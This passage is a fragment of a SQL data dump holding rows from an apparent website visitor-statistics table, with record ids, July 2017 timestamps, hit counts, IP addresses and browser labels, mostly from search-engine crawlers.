80','other'),(136210,1500798099,1,1,0,0,'213.180.203.43','other'),(136211,1500798620,1,1,0,0,'217.182.132.97','other'),(136212,1500798717,1,1,0,0,'5.45.207.66','other'),(136213,1500798818,1,1,0,0,'213.180.203.14','other'),(136214,1500798822,1,1,0,0,'37.9.113.137','other'),(136215,1500798921,1,0,1,0,'66.249.76.107',''),(136216,1500798929,1,1,0,0,'216.244.66.246','other'),(136217,1500799801,1,1,0,0,'91.209.11.236','other'),(136218,1500800020,1,1,0,0,'178.154.171.45','other'),(136219,1500800140,1,1,0,0,'217.182.132.30','other'),(136220,1500800535,1,1,0,0,'137.74.207.120','other'),(136221,1500800583,1,1,0,0,'217.182.132.19','other'),(136222,1500800954,1,1,0,0,'173.212.225.221','other'),(136223,1500801253,1,1,0,0,'66.249.76.107','chrome'),(136224,1500801322,2,0,2,0,'66.249.76.89',''),(136225,1500801485,1,1,0,0,'217.182.132.173','other'),(136226,1500801659,4,4,0,0,'216.244.66.194','other'),(136227,1500801943,1,1,0,0,'217.182.132.191','other'),(136228,1500801999,1,1,0,0,'51.255.65.36','other'),(136229,1500802363,1,1,0,0,'37.9.113.128','other'),(136230,1500802424,1,1,0,0,'95.108.181.60','other'),(136231,1500802765,1,0,1,0,'66.249.76.91',''),(136232,1500802904,1,1,0,0,'51.255.71.98','other'),(136233,1500803216,1,1,0,0,'91.209.11.236','other'),(136234,1500803831,1,1,0,0,'217.182.132.61','other'),(136235,1500803978,1,1,0,0,'51.255.65.36','other'),(136236,1500804624,1,1,0,0,'91.209.11.236','other'),(136237,1500804851,1,1,0,0,'5.9.111.70','other'),(136238,1500804981,1,1,0,0,'37.9.113.128','other'),(136239,1500805091,1,1,0,0,'51.255.65.34','other'),(136240,1500805095,1,1,0,0,'37.9.113.138','other'),(136241,1500805231,1,1,0,0,'66.249.76.108','chrome'),(136242,1500805244,1,1,0,0,'51.255.65.8','other'),(136243,1500805309,1,1,0,0,'217.182.132.173','other'),(136244,1500805473,1,1,0,0,'216.244.66.194','other'),(136245,1500805680,1,1,0,0,'217.182.132.73','other'),(136246,1500805843,1,1,0,0,'51.255.71.125','other'),(136247,1500805957,4,4,0,0,'216.244.66.246','other'),(136248,1500806072,1,1,0,0,'213.180.203.14','other'),(136249,1500806250,1,1,0,0,'91.209.11.236','other'),(136250,1500806497,1,1,0,0,'217.182.132.93','other'),(136251,1500806633,1,1,0,0,'217.182.132.150','other'),(136252,1500806930,1,1,0,0,'37.9.113.78','other'),(136253,1500807358,1,1,0,0,'217.182.132.19','other'),(136254,1500807569,1,1,0,0,'66.249.66.157','chrome'),(136255,1500807633,1,1,0,0,'51.255.65.16','other'),(136256,1500807861,1,1,0,0,'213.180.203.21','other'),(136257,1500807899,1,1,0,0,'66.102.9.29','chrome'),(136258,1500807992,1,1,0,0,'8.29.198.25','other'),(136259,1500808170,1,1,0,0,'91.196.178.40','chrome'),(136260,1500808281,1,1,0,0,'217.182.132.81','other'),(136261,1500808649,1,1,0,0,'40.77.167.123','other'),(136262,1500809033,4,4,0,0,'216.244.66.194','other'),(136263,1500809087,1,1,0,0,'51.255.65.13','other'),(136264,1500809220,3,3,0,0,'216.244.66.246','other'),(136265,1500809274,1,1,0,0,'51.255.65.88','other'),(136266,1500809307,1,1,0,0,'164.132.162.154','other'),(136267,1500809796,1,1,0,0,'51.255.65.5','other'),(136268,1500809799,1,1,0,0,'95.108.181.57','other'),(136269,1500810044,1,1,0,0,'91.209.11.236','other'),(136270,1500810557,1,0,1,0,'68.180.230.48',''),(136271,1500810983,1,1,0,0,'217.182.132.146','other'),(136272,1500811131,1,1,0,0,'51.255.65.92','other'),(136273,1500811794,2,2,0,0,'91.209.11.236','other'),(136274,1500812002,1,1,0,0,'5.45.207.83','other'),(136275,1500812283,1,1,0,0,'216.244.66.246','other'),(136276,1500812380,1,1,0,0,'95.108.181.57','other'),(136277,1500812816,1,1,0,0,'66.249.76.89','chrome'),(136278,1500813018,1,1,0,0,'217.182.132.240','other'),(136279,1500813062,1,1,0,0,'51.255.65.29','other'),(136280,1500813092,1,1,0,0,'95.108.181.60','other'),(136281,1500813255,1,1,0,0,'217.182.132.90','other'),(136282,1500813469,1,1,0,0,'213.180.203.43','other'),(136283,1500813473,1,1,0,0,'37.9.113.128','other'),(136284,1500813576,1,1,0,0,'37.9.113.94','other'),(136285,1500813942,1,1,0,0,'51.255.65.59','other'),(136286,1500814420,1,1,0,0,'89.179.106.79','msie'),(136287,1500814623,1,1,0,0,'217.182.132.59','other'),(136288,1500815072,1,1,0,0,'217.182.132.173','other'),(136289,1500815507,1,1,0,0,'51.255.65.57','other'),(136290,1500815727,1,1,0,0,'51.255.65.84','other'),(136291,1500815841,1,1,0,0,'51.255.65.97','other'),(136292,1500816086,2,2,0,0,'217.69.133.3','other'),(136293,1500816136,7,7,0,0,'216.244.66.246','other'),(136294,1500816442,6,6,0,0,'216.244.66.194','other'),(136295,1500816692,1,1,0,0,'51.255.65.60','other'),(136296,1500816728,1,1,0,0,'137.74.207.110','other'),(136297,1500816748,2,2,0,0,'95.108.181.57','other'),(136298,1500816761,1,0,1,0,'66.249.76.93',''),(136299,1500816811,1,0,1,0,'66.249.76.89',''),(136300,1500816825,1,0,1,0,'66.249.66.74',''),(136301,1500816863,1,1,0,0,'5.45.207.56','other'),(136302,1500816990,1,1,0,0,'51.255.71.121','other'),(136303,1500817102,1,1,0,0,'213.180.203.14','other'),(136304,1500817283,1,1,0,0,'40.77.167.123','other'),(136305,1500817382,1,1,0,0,'51.255.65.34','other'),(136306,1500817782,1,1,0,0,'217.69.133.4','other'),(136307,1500817996,1,1,0,0,'216.244.66.237','other'),(136308,1500818093,1,1,0,0,'217.182.132.187','other'),(136309,1500818493,1,1,0,0,'213.180.203.43','other'),(136310,1500818747,1,0,1,0,'66.249.66.74',''),(136311,1500818822,1,1,0,0,'8.29.198.26','other'),(136312,1500818824,1,1,0,0,'217.182.132.157','other'),(136313,1500818850,1,1,0,0,'137.74.207.120','other'),(136314,1500818877,1,1,0,0,'37.9.113.128','other'),(136315,1500818968,1,1,0,0,'217.182.132.87','other'),(136316,1500819086,1,1,0,0,'213.180.203.32','other'),(136317,1500819415,2,2,0,0,'216.244.66.246','other'),(136318,1500819628,1,1,0,0,'91.209.11.236','other'),(136319,1500819754,1,1,0,0,'217.182.132.23','other'),(136320,1500819907,1,1,0,0,'137.74.207.120','other'),(136321,1500820135,1,0,1,0,'66.249.76.131',''),(136322,1500820170,4,4,0,0,'216.244.66.194','other'),(136323,1500820457,1,1,0,0,'217.182.132.81','other'),(136324,1500820516,1,1,0,0,'123.125.67.162','chrome'),(136325,1500820777,1,1,0,0,'178.154.171.3','other'),(136326,1500820781,1,1,0,0,'5.45.207.66','other'),(136327,1500821230,1,1,0,0,'51.255.65.41','other'),(136328,1500821534,1,1,0,0,'91.209.11.236','other'),(136329,1500821558,1,1,0,0,'142.4.218.156','other'),(136330,1500821574,1,1,0,0,'142.4.218.156','chrome'),(136331,1500821952,1,1,0,0,'51.255.71.121','other'),(136332,1500822218,1,1,0,0,'123.125.67.165','chrome'),(136333,1500822355,1,1,0,0,'217.69.133.9','other'),(136334,1500822812,3,3,0,0,'91.209.11.236','other'),(136335,1500823115,1,1,0,0,'137.74.207.164','other'),(136336,1500823129,1,0,1,0,'66.249.66.74',''),(136337,1500823145,1,0,1,0,'66.249.76.91',''),(136338,1500823162,1,0,1,0,'66.249.76.89',''),(136339,1500823202,7,7,0,0,'216.244.66.246','other'),(136340,1500823233,1,1,0,0,'217.182.132.156','other'),(136341,1500823262,1,1,0,0,'217.69.133.2','other'),(136342,1500823564,1,1,0,0,'217.182.132.90','other'),(136343,1500823806,1,1,0,0,'51.255.71.112','other'),(136344,1500823965,1,1,0,0,'5.45.207.57','other'),(136345,1500824079,1,1,0,0,'213.180.203.14','other'),(136346,1500824606,1,1,0,0,'5.45.207.66','other'),(136347,1500824677,1,1,0,0,'95.108.181.63','other'),(136348,1500824702,1,1,0,0,'95.108.181.57','other'),(136349,1500825054,2,2,0,0,'216.244.66.194','other'),(136350,1500825169,1,1,0,0,'5.45.207.64','other'),(136351,1500826109,1,1,0,0,'178.154.171.53','other'),(136352,1500826245,1,1,0,0,'37.9.113.94','other'),(136353,1500826419,1,1,0,0,'217.182.132.187','other'),(136354,1500826582,1,1,0,0,'91.209.11.236','other'),(136355,1500826853,1,1,0,0,'51.255.65.47','other'),(136356,1500827356,4,4,0,0,'216.244.66.194','other'),(136357,1500827364,1,1,0,0,'95.108.181.60','other'),(136358,1500827431,1,1,0,0,'37.9.113.138','other'),(136359,1500827707,1,1,0,0,'213.180.203.43','other'),(136360,1500828521,1,0,1,0,'66.249.66.74',''),(136361,1500828523,1,1,0,0,'217.182.132.93','other'),(136362,1500828675,2,2,0,0,'91.209.11.236','other'),(136363,1500828957,1,1,0,0,'51.255.65.10','other'),(136364,1500829038,1,1,0,0,'137.74.207.108','other'),(136365,1500829047,8,8,0,0,'216.244.66.194','other'),(136366,1500829076,1,1,0,0,'37.9.113.94','other'),(136367,1500829658,1,1,0,0,'8.29.198.25','other'),(136368,1500829686,1,1,0,0,'5.45.207.57','other'),(136369,1500829732,1,1,0,0,'164.132.164.180','other'),(136370,1500830134,2,0,2,0,'66.249.76.91',''),(136371,1500830293,1,1,0,0,'91.195.137.189','chrome'),(136372,1500830325,1,1,0,0,'5.45.207.66','other'),(136373,1500830337,1,1,0,0,'217.182.132.57','other'),(136374,1500830378,1,0,1,0,'66.249.76.89',''),(136375,1500831171,5,5,0,0,'216.244.66.246','other'),(136376,1500831817,1,1,0,0,'51.255.65.14','other'),(136377,1500831860,1,1,0,0,'157.55.39.93','other'),(136378,1500832437,1,1,0,0,'217.182.132.173','other'),(136379,1500832759,1,1,0,0,'51.255.71.98','other'),(136380,1500832771,1,1,0,0,'91.209.11.236','other'),(136381,1500832925,1,1,0,0,'213.180.203.18','other'),(136382,1500833198,1,1,0,0,'213.180.203.32','other'),(136383,1500833234,1,1,0,0,'178.154.171.59','other'),(136384,1500833350,2,2,0,0,'213.180.203.14','other'),(136385,1500833381,5,5,0,0,'216.244.66.246','other'),(136386,1500833427,1,1,0,0,'157.55.39.93','other'),(136387,1500833575,1,1,0,0,'217.182.132.59','other'),(136388,1500833723,1,1,0,0,'217.182.132.33','other'),(136389,1500834017,1,1,0,0,'91.209.11.236','other'),(136390,1500834066,1,1,0,0,'185.137.17.43','chrome'),(136391,1500834800,1,1,0,0,'217.182.132.193','other'),(136392,1500836074,1,1,0,0,'5.45.207.56','other'),(136393,1500836116,1,1,0,0,'79.143.42.90','other'),(136394,1500836264,1,1,0,0,'91.209.11.236','other'),(136395,1500836294,1,1,0,0,'137.74.201.100','other'),(136396,1500836315,1,1,0,0,'217.182.132.16','other'),(136397,1500836386,1,1,0,0,'217.182.132.59','other'),(136398,1500836466,1,1,0,0,'178.154.171.3','other'),(136399,1500836708,5,5,0,0,'216.244.66.194','other'),(136400,1500837068,1,1,0,0,'217.182.132.21','other'),(136401,1500837093,1,1,0,0,'51.255.65.43','other'),(136402,1500837415,1,1,0,0,'51.255.71.122','other'),(136403,1500837546,1,0,1,0,'66.249.76.93',''),(136404,1500837578,1,0,1,0,'66.249.76.91',''),(136405,1500837594,1,0,1,0,'66.249.66.74',''),(136406,1500837732,1,1,0,0,'178.154.171.59','other'),(136407,1500837985,1,1,0,0,'178.154.171.18','other'),(136408,1500838083,1,1,0,0,'66.249.76.131','chrome'),(136409,1500838088,1,1,0,0,'91.209.11.236','other'),(136410,1500838214,1,1,0,0,'95.221.202.22','msie'),(136411,1500838438,1,1,0,0,'217.182.132.88','other'),(136412,1500838602,1,0,1,0,'66.249.76.137',''),(136413,1500838604,1,0,1,0,'66.249.76.93',''),(136414,1500839206,1,1,0,0,'91.209.11.236','other'),(136415,1500839262,1,1,0,0,'51.255.71.132','other'),(136416,1500839314,1,1,0,0,'217.182.132.74','other'),(136417,1500839534,1,1,0,0,'51.255.71.101','other'),(136418,1500839669,1,1,0,0,'217.182.132.178','other'),(136419,1500839777,1,0,1,0,'66.249.66.74',''),(136420,1500839831,8,8,0,0,'216.244.66.246','other'),(136421,1500840341,1,1,0,0,'5.45.207.66','other'),(136422,1500840395,1,1,0,0,'91.209.11.236','other'),(136423,1500840489,1,1,0,0,'8.29.198.25','other'),(136424,1500840687,1,1,0,0,'217.182.132.58','other'),(136425,1500840784,1,1,0,0,'51.255.71.127','other'),(136426,1500840873,1,1,0,0,'51.255.71.111','other'),(136427,1500840933,1,1,0,0,'51.255.65.31','other'),(136428,1500840944,1,1,0,0,'178.154.171.3','other'),(136429,1500841351,2,2,0,0,'213.180.203.42','other'),(136430,1500841362,1,1,0,0,'178.140.233.81','chrome'),(136431,1500841438,1,1,0,0,'178.154.171.53','other'),(136432,1500841567,1,1,0,0,'217.182.132.53','other'),(136433,1500841683,1,1,0,0,'66.249.76.91','chrome'),(136434,1500842074,1,0,1,0,'66.249.66.76',''),(136435,1500842244,1,1,0,0,'217.182.132.191','other'),(136436,1500842288,1,1,0,0,'217.182.132.183','other'),(136437,1500842473,1,1,0,0,'164.132.162.154','other'),(136438,1500842526,1,1,0,0,'51.255.65.26','other'),(136439,1500842774,1,1,0,0,'213.180.203.25','other'),(136440,1500842799,1,1,0,0,'213.180.203.32','other'),(136441,1500842849,1,1,0,0,'95.108.181.63','other'),(136442,1500843034,1,1,0,0,'5.45.207.66','other'),(136443,1500843066,1,1,0,0,'217.182.132.146','other'),(136444,1500843254,1,1,0,0,'217.182.132.92','other'),(136445,1500843351,1,1,0,0,'217.182.132.30','other'),(136446,1500843493,1,1,0,0,'91.209.11.236','other'),(136447,1500843548,1,1,0,0,'40.77.167.42','other'),(136448,1500844248,1,1,0,0,'178.154.171.18','other'),(136449,1500844646,1,0,1,0,'66.249.66.76',''),(136450,1500844684,1,0,1,0,'66.249.76.93',''),(136451,1500844707,2,0,2,0,'66.249.76.91',''),(136452,1500844796,3,3,0,0,'91.209.11.236','other'),(136453,1500844815,1,1,0,0,'164.132.162.187','other'),(136454,1500844928,1,1,0,0,'40.77.167.42','other'),(136455,1500845173,3,3,0,0,'216.244.66.246','other'),(136456,1500845341,1,1,0,0,'137.74.207.114','other'),(136457,1500845452,1,1,0,0,'51.255.65.70','other'),(136458,1500846034,2,2,0,0,'213.180.203.42','other'),(136459,1500846073,1,1,0,0,'137.74.207.102','other'),(136460,1500846273,1,1,0,0,'5.45.207.64','other'),(136461,1500846526,1,1,0,0,'51.255.65.67','other'),(136462,1500846626,1,1,0,0,'51.255.65.19','other'),(136463,1500846817,1,1,0,0,'37.9.113.138','other'),(136464,1500846885,1,1,0,0,'51.255.71.118','other'),(136465,1500846946,1,1,0,0,'213.180.203.21','other'),(136466,1500847143,1,1,0,0,'137.74.207.101','other'),(136467,1500847232,2,2,0,0,'91.209.11.236','other'),(136468,1500847359,1,1,0,0,'51.255.65.34','other'),(136469,1500847435,1,1,0,0,'95.108.181.57','other'),(136470,1500848190,1,1,0,0,'164.132.162.188','other'),(136471,1500848217,1,1,0,0,'37.9.113.78','other'),(136472,1500848873,1,1,0,0,'91.209.11.236','other'),(136473,1500848976,1,1,0,0,'51.255.65.53','other'),(136474,1500849454,1,1,0,0,'213.180.203.42','other'),(136475,1500849888,1,1,0,0,'164.132.162.164','other'),(136476,1500849926,1,1,0,0,'213.180.203.32','other'),(136477,1500850129,1,1,0,0,'51.255.65.35','other'),(136478,1500850184,1,1,0,0,'217.182.132.94','other'),(136479,1500850582,2,2,0,0,'216.244.66.194','other'),(136480,1500850652,1,1,0,0,'217.69.133.9','other'),(136481,1500850817,1,1,0,0,'51.255.71.116','other'),(136482,1500851074,3,3,0,0,'216.244.66.246','other'),(136483,1500851088,1,1,0,0,'213.180.203.18','other'),(136484,1500851146,1,1,0,0,'213.180.203.32','other'),(136485,1500851321,1,1,0,0,'8.29.198.26','other'),(136486,1500851542,1,1,0,0,'164.132.162.188','other'),(136487,1500852610,1,1,0,0,'157.55.39.93','other'),(136488,1500852861,1,1,0,0,'51.255.65.55','other'),(136489,1500853277,2,2,0,0,'213.180.203.25','other'),(136490,1500853844,1,1,0,0,'37.9.113.78','other'),(136491,1500853923,1,1,0,0,'217.182.132.178','other'),(136492,1500853952,1,1,0,0,'217.182.132.96','other'),(136493,1500854028,1,1,0,0,'217.182.132.64','other'),(136494,1500854580,2,2,0,0,'216.244.66.246','other'),(136495,1500855154,1,1,0,0,'217.182.132.76','other'),(136496,1500855315,1,1,0,0,'213.180.203.32','other'),(136497,1500855387,1,1,0,0,'178.154.171.59','other'),(136498,1500855606,1,1,0,0,'178.154.171.18','other'),(136499,1500855853,1,1,0,0,'51.255.65.64','other'),(136500,1500855910,1,1,0,0,'157.55.39.93','other'),(136501,1500856264,1,1,0,0,'51.255.65.31','other'),(136502,1500856409,1,1,0,0,'217.182.132.175','other'),(136503,1500857129,1,0,1,0,'66.249.76.89',''),(136504,1500857366,1,0,1,0,'66.249.76.91',''),(136505,1500857448,1,1,0,0,'178.154.171.3','other'),(136506,1500858095,2,2,0,0,'91.209.11.236','other'),(136507,1500858263,1,1,0,0,'217.182.132.76','other'),(136508,1500858313,1,1,0,0,'51.255.71.128','other'),(136509,1500858401,1,1,0,0,'178.154.171.53','other'),(136510,1500858730,8,8,0,0,'216.244.66.194','other'),(136511,1500858871,1,1,0,0,'217.182.132.191','other'),(136512,1500858998,1,0,1,0,'66.249.66.75',''),(136513,1500859043,1,1,0,0,'40.77.167.42','other'),(136514,1500859259,1,1,0,0,'137.74.207.116','other'),(136515,1500859491,1,1,0,0,'217.182.132.240','other'),(136516,1500859537,1,1,0,0,'40.77.167.123','other'),(136517,1500859567,1,1,0,0,'91.209.11.236','other'),(136518,1500859771,1,1,0,0,'213.180.203.18','other'),(136519,1500859957,1,1,0,0,'217.69.133.3','other'),(136520,1500860306,1,1,0,0,'213.180.203.21','other'),(136521,1500860694,6,6,0,0,'216.244.66.246','other'),(136522,1500861243,1,1,0,0,'51.255.65.48','other'),(136523,1500861810,1,1,0,0,'5.45.207.83','other'),(136524,1500862154,1,1,0,0,'8.29.198.27','other'),(136525,1500862316,1,1,0,0,'95.108.181.52','other'),(136526,1500863037,1,1,0,0,'91.209.11.236','other'),(136527,1500863337,1,1,0,0,'164.132.162.164','other'),(136528,1500863377,1,1,0,0,'51.255.65.12','other'),(136529,1500863397,1,0,1,0,'66.249.76.91',''),(136530,1500863706,1,1,0,0,'217.182.132.186','other'),(136531,1500863732,1,1,0,0,'40.77.167.123','other'),(136532,1500864073,1,1,0,0,'213.180.203.42','other'),(136533,1500864074,1,1,0,0,'217.182.132.87','other'),(136534,1500864445,1,1,0,0,'217.182.132.81','other'),(136535,1500864629,1,1,0,0,'178.154.171.18','other'),(136536,1500864774,1,1,0,0,'178.154.171.3','other'),(136537,1500865400,5,5,0,0,'216.244.66.246','other'),(136538,1500865428,1,1,0,0,'217.69.133.4','other'),(136539,1500865660,1,1,0,0,'40.77.167.123','other'),(136540,1500865997,1,1,0,0,'213.180.203.14','other'),(136541,1500866005,1,1,0,0,'51.255.71.119','other'),(136542,1500866020,1,1,0,0,'51.255.65.13','other'),(136543,1500866428,1,1,0,0,'213.180.203.42','other'),(136544,1500866536,1,1,0,0,'91.209.11.236','other'),(136545,1500868604,1,1,0,0,'217.182.132.77','other'),(136546,1500868858,1,1,0,0,'91.209.11.236','other'),(136547,1500869038,1,1,0,0,'37.9.113.94','other'),(136548,1500869135,2,2,0,0,'54.165.59.7','other'),(136549,1500869236,9,9,0,0,'216.244.66.194','other'),(136550,1500869356,1,1,0,0,'40.77.167.42','other'),(136551,1500869360,1,1,0,0,'51.255.65.32','other'),(136552,1500869486,2,2,0,0,'95.213.141.126','opera'),(136553,1500869828,1,1,0,0,'176.193.132.139','msie'),(136554,1500869830,1,1,0,0,'95.46.247.195','msie'),(136555,1500870238,1,1,0,0,'51.255.71.113','other'),(136556,1500870433,1,1,0,0,'217.182.132.83','other'),(136557,1500870822,3,3,0,0,'216.244.66.246','other'),(136558,1500870942,1,1,0,0,'51.255.71.126','other'),(136559,1500871145,1,1,0,0,'91.196.178.71','firefox'),(136560,1500871459,1,1,0,0,'37.9.113.94','other'),(136561,1500871485,1,1,0,0,'51.255.65.65','other'),(136562,1500871649,1,1,0,0,'217.69.133.5','other'),(136563,1500871712,1,0,1,0,'66.249.66.156',''),(136564,1500871728,1,0,1,0,'66.249.76.93',''),(136565,1500871789,1,1,0,0,'51.255.65.57','other'),(136566,1500871985,1,1,0,0,'51.255.65.64','other'),(136567,1500872002,1,1,0,0,'40.77.167.42','other'),(136568,1500872223,1,0,1,0,'66.249.76.91',''),(136569,1500872370,1,1,0,0,'95.108.181.58','other'),(136570,1500872410,1,1,0,0,'194.44.98.218','chrome'),(136571,1500872976,1,1,0,0,'91.196.178.67','firefox'),(136572,1500872980,1,1,0,0,'8.29.198.27','other'),(136573,1500873137,2,1,1,0,'66.249.76.89',''),(136574,1500873190,1,1,0,0,'217.182.132.24','other'),(136575,1500873261,1,1,0,0,'51.255.65.25','other'),(136576,1500873450,1,1,0,0,'217.182.132.79','other'),(136577,1500873462,1,0,1,0,'66.249.66.74',''),(136578,1500873493,1,0,1,0,'66.249.76.93',''),(136579,1500873860,1,1,0,0,'91.209.11.236','other'),(136580,1500873996,1,1,0,0,'213.180.203.14','other'),(136581,1500874107,1,1,0,0,'91.196.178.65','firefox'),(136582,1500874112,1,1,0,0,'66.249.66.155','chrome'),(136583,1500874154,1,1,0,0,'217.182.132.93','other'),(136584,1500874339,2,2,0,0,'95.108.181.69','other'),(136585,1500874366,1,1,0,0,'178.94.222.60','chrome'),(136586,1500874547,1,1,0,0,'37.9.113.138','other'),(136587,1500874997,1,1,0,0,'164.132.162.155','other'),(136588,1500875040,1,1,0,0,'37.9.113.66','other'),(136589,1500875143,1,1,0,0,'178.154.171.3','other'),(136590,1500875227,1,0,1,0,'66.249.76.89',''),(136591,1500875639,1,1,0,0,'51.255.71.129','other'),(136592,1500875712,1,1,0,0,'95.108.181.58','other'),(136593,1500875784,1,1,0,0,'91.196.178.68','chrome'),(136594,1500875874,1,1,0,0,'217.182.132.183','other'),(136595,1500876055,1,1,0,0,'178.154.171.18','other'),(136596,1500876088,3,3,0,0,'216.244.66.246','other'),(136597,1500876383,1,1,0,0,'46.201.244.251','firefox'),(136598,1500876388,1,1,0,0,'217.69.133.5','other'),(136599,1500876647,1,1,0,0,'66.249.76.91','chrome'),(136600,1500876720,1,1,0,0,'51.255.71.110','other'),(136601,1500877376,1,1,0,0,'66.249.66.76','chrome'),(136602,1500877617,1,1,0,0,'178.94.222.60','chrome'),(136603,1500877635,1,1,0,0,'51.255.71.98','other'),(136604,1500877811,1,1,0,0,'46.161.9.39','firefox'),(136605,1500877832,1,1,0,0,'217.182.132.18','other'),(136606,1500877846,1,1,0,0,'37.9.113.128','other'),(136607,1500878306,1,1,0,0,'5.45.207.66','other'),(136608,1500878401,1,0,1,0,'66.249.66.76',''),(136609,1500878417,2,0,2,0,'66.249.76.89',''),(136610,1500878853,2,2,0,0,'66.249.66.74','chrome'),(136611,1500878993,1,1,0,0,'5.45.207.83','other'),(136612,1500879123,31,31,0,0,'88.198.67.69','other'),(136613,1500879343,1,1,0,0,'91.196.178.67','chrome'),(136614,1500879376,1,1,0,0,'213.180.203.32','other'),(136615,1500879386,1,1,0,0,'51.255.65.53','other'),(136616,1500879458,1,1,0,0,'93.183.226.149','chrome'),(136617,1500879500,2,0,2,0,'66.249.76.93',''),(136618,1500880004,1,1,0,0,'217.182.132.147','other'),(136619,1500880173,6,6,0,0,'216.244.66.194','other'),(136620,1500880232,1,1,0,0,'5.45.207.66','other'),(136621,1500880408,1,1,0,0,'137.74.207.119','other'),(136622,1500880539,1,1,0,0,'66.249.76.137','chrome'),(136623,1500881028,1,0,1,0,'66.249.66.76',''),(136624,1500881229,3,3,0,0,'216.244.66.246','other'),(136625,1500881356,1,1,0,0,'217.182.132.21','other'),(136626,1500881902,1,1,0,0,'46.201.175.91','firefox'),(136627,1500882007,1,0,1,0,'66.249.76.91',''),(136628,1500882240,1,0,1,0,'68.180.230.48',''),(136629,1500883518,1,1,0,0,'178.154.171.59','other'),(136630,1500883724,1,1,0,0,'217.182.132.181','other'),(136631,1500883742,1,1,0,0,'51.255.65.9','other'),(136632,1500883766,1,1,0,0,'62.210.103.36','other'),(136633,1500883786,1,1,0,0,'37.9.113.128','other'),(136634,1500883811,1,1,0,0,'8.29.198.26','other'),(136635,1500883837,1,1,0,0,'5.45.207.64','other'),(136636,1500883868,1,1,0,0,'51.255.65.39','other'),(136637,1500883968,2,2,0,0,'54.165.59.7','other'),(136638,1500884048,1,1,0,0,'178.154.171.3','other'),(136639,1500884431,1,1,0,0,'217.182.132.61','other'),(136640,1500884573,1,1,0,0,'91.196.177.46','chrome'),(136641,1500884831,1,1,0,0,'217.182.132.71','other'),(136642,1500885008,1,1,0,0,'164.132.162.154','other'),(136643,1500885051,1,1,0,0,'95.108.181.52','other'),(136644,1500885212,1,1,0,0,'95.108.181.60','other'),(136645,1500885258,1,1,0,0,'51.255.65.57','other'),(136646,1500885394,1,0,1,0,'68.180.230.48',''),(136647,1500885537,1,1,0,0,'137.74.203.194','other'),(136648,1500885653,1,1,0,0,'217.182.132.184','other'),(136649,1500885855,1,1,0,0,'91.196.178.68','chrome'),(136650,1500886016,1,1,0,0,'91.196.178.71','chrome'),(136651,1500886303,1,1,0,0,'213.180.203.32','other'),(136652,1500886483,1,1,0,0,'217.182.132.74','other'),(136653,1500886665,1,1,0,0,'194.44.48.3','chrome'),(136654,1500886739,1,0,1,0,'66.249.66.75',''),(136655,1500886741,1,0,1,0,'66.249.66.74',''),(136656,1500886860,4,4,0,0,'216.244.66.246','other'),(136657,1500886917,1,1,0,0,'91.196.178.71','chrome'),(136658,1500887290,1,1,0,0,'217.182.132.28','other'),(136659,1500887336,1,1,0,0,'217.182.132.181','other'),(136660,1500887645,1,1,0,0,'217.182.132.185','other'),(136661,1500887821,1,1,0,0,'51.255.65.72','other'),(136662,1500888485,1,1,0,0,'5.45.207.83','other'),(136663,1500888489,2,2,0,0,'37.9.113.128','other'),(136664,1500888654,1,1,0,0,'51.255.65.68','other'),(136665,1500888659,2,2,0,0,'216.244.66.194','other'),(136666,1500889171,1,1,0,0,'91.209.11.236','other'),(136667,1500889457,1,1,0,0,'217.182.132.62','other'),(136668,1500889531,1,1,0,0,'217.182.132.17','other'),(136669,1500889791,1,1,0,0,'180.76.15.153','other'),(136670,1500889856,1,1,0,0,'91.196.178.168','chrome'),(136671,1500890053,1,1,0,0,'51.255.65.43','other'),(136672,1500890145,1,1,0,0,'217.182.132.30','other'),(136673,1500890167,2,2,0,0,'128.199.42.73','chrome'),(136674,1500890637,1,1,0,0,'213.180.203.32','other'),(136675,1500890879,5,5,0,0,'216.244.66.194','other'),(136676,1500891027,1,1,0,0,'91.209.11.236','other'),(136677,1500891502,1,1,0,0,'213.180.203.18','other'),(136678,1500891656,1,1,0,0,'51.255.65.79','other'),(136679,1500891775,1,1,0,0,'164.132.162.159','other'),(136680,1500891850,1,1,0,0,'178.154.171.42','other'),(136681,1500891858,1,1,0,0,'217.182.132.4','other'),(136682,1500892271,1,1,0,0,'213.159.239.163','other'),(136683,1500892365,1,1,0,0,'193.19.152.77','chrome'),(136684,1500892544,1,1,0,0,'37.9.113.78','other'),(136685,1500892911,1,1,0,0,'91.209.11.236','other'),(136686,1500893013,3,3,0,0,'216.244.66.246','other'),(136687,1500893321,1,1,0,0,'5.45.207.64','other'),(136688,1500893516,1,1,0,0,'95.135.214.69','firefox'),(136689,1500893668,1,1,0,0,'91.196.178.71','firefox'),(136690,1500893684,1,1,0,0,'5.45.207.57','other'),(136691,1500893811,1,1,0,0,'217.182.132.20','other'),(136692,1500894555,1,1,0,0,'91.196.178.70','chrome'),(136693,1500894677,1,1,0,0,'8.29.198.26','other'),(136694,1500894970,1,1,0,0,'95.108.181.58','other'),(136695,1500895000,1,1,0,0,'37.54.166.61','opera'),(136696,1500895067,1,1,0,0,'51.255.65.73','other'),(136697,1500895143,1,1,0,0,'95.132.59.138','firefox'),(136698,1500895177,1,1,0,0,'157.55.39.93','other'),(136699,1500895239,1,1,0,0,'51.255.65.71','other'),(136700,1500895371,1,1,0,0,'51.255.65.29','other'),(136701,1500895476,1,0,1,0,'66.249.76.89',''),(136702,1500895502,1,1,0,0,'95.108.181.52','other'),(136703,1500895738,1,1,0,0,'178.154.171.53','other'),(136704,1500896127,1,1,0,0,'217.182.132.33','other'),(136705,1500896252,1,1,0,0,'37.9.113.128','other'),(136706,1500896269,1,1,0,0,'91.209.11.236','other'),(136707,1500896424,1,1,0,0,'51.255.65.90','other'),(136708,1500896509,1,1,0,0,'178.92.238.136','chrome'),(136709,1500896702,1,1,0,0,'79.165.136.129','msie'),(136710,1500896719,1,1,0,0,'51.255.65.45','other'),(136711,1500897083,1,1,0,0,'217.182.132.172','other'),(136712,1500897246,1,1,0,0,'81.30.171.159','chrome'),(136713,1500897504,1,1,0,0,'37.9.113.94','other'),(136714,1500897542,1,1,0,0,'37.55.26.134','chrome'),(136715,1500897768,1,1,0,0,'46.161.9.39','chrome'),(136716,1500897803,2,2,0,0,'216.244.66.246','other'),(136717,1500897899,1,1,0,0,'176.31.231.10','other'),(136718,1500897900,1,1,0,0,'95.108.181.60','other'),(136719,1500898262,1,1,0,0,'217.182.132.188','other'),(136720,1500898268,1,1,0,0,'217.69.133.4','other'),(136721,1500898270,1,1,0,0,'217.69.133.203','other'),(136722,1500898442,1,1,0,0,'217.182.132.96','other'),(136723,1500898459,1,1,0,0,'178.154.171.59','other'),(136724,1500898605,1,1,0,0,'91.196.178.71','chrome'),(1367